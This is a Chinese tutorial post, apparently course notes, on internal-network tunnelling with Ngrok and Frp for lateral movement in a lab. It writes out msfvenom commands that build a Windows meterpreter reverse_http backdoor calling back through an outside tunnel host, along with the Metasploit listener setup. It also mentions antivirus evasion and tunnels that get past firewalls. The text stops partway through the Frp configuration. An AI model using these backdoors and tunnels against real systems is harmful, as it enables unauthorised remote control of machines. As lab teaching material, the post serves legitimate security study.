第70天-内网安全-域横向内网漫游 Socks 代理隧道技

内网穿透与安全测试实践
本文详细介绍了内网穿透技术,包括Ngrok和Frp的使用,以及内网穿透代理隧道技术在多层内网环境下的应用。通过实例演示了如何在不同内网之间建立通信,并利用Metasploit进行渗透测试,展示了从信息收集、漏洞利用到权限提升的完整过程。同时,文章还涉及了网络安全测试中的SQL注入、MS17010漏洞利用等常见攻击手段。

思维导图

基础知识点

1.内外网简单知识

  • 内网ip地址是私有ip地址(10/8, 172.16/12 , 192.168/16),除此之外就是外网ip。

2.内网1和内网2通信问题

  • 两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的,必须要借助代理。

3.正反向协议通信连接问题

  • 正向:攻击者去连接受害者
    • 攻击者处于内网受害者处于外网
  • 反向:受害者去连接攻击者
    • 攻击者处于外网受害者处于内网
  • 为什么要区分正向和反向?
  • 因为如果控制端是外网主机(103.12.4.11),被控端是内网主机(192.168.23.36),内网被控端,通过控制端主动去找是找不到的,因为这个内网的IP地址并不是唯一的,可能很多内网都用了这个IP地址,你根本没法找。此时就需要反向连接了,让内网的被控端主动去找外网的控制端。

4.内网穿透代理隧道技术说明

  • 代理主要解决网络的连通性问题
  • 隧道主要解决流量分析工具、流量监控工具、防火墙等相关工具的过滤问题

演示案例:

1-内网穿透 Ngrok 测试演示-两个内网通讯上线

实验拓扑

Ngrok

国外:https://ngrok.com

国内:https://www.ngrok.cc/

1、注册登录
2、下载相应版本客户端

linux查看系统位数—uname -m

70-4

3、开通隧道

4、配置本地端口

(虚拟机kali的)

实验开始

协议:http 本地端口:192.168.80.137:4444

测试:内网win7 执行后门—免费主机处理—内网 kali 监听—内网 kali 接受器

./sunny clientid 隧道号
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.80.137
set lport 4444
exploit
1、将Ngrok客户端传到 kali上,启动
./sunny clientid 隧道号

2、msf生成后门
msfvenom -p windows/meterpreter/reverse_http lhost=liandy.free.idcfengye.com lport=80 -f exe -o test.exe

3、配置并监听(一旦liandy.free.idcfengye.com有流量,就发给本地192.168.80.136:4444)

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.80.137
set lport 4444
exploit

4、在windows7运行test.exe

一直没出结果,test运行一会儿,进程就停止了。可能需要做免杀,不过无伤大雅!

  • 就是通过外网服务器做个桥梁,双方都能访问到,从而建立连接。

2-内网穿透 Frp 自建跳板测试-两个内网通讯上线

实验拓扑图

70-1

1.服务端-下载-解压-修改-启动(云主机记得修改安全组配置出入口

服务器修改配置文件 frps.ini:
[common
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值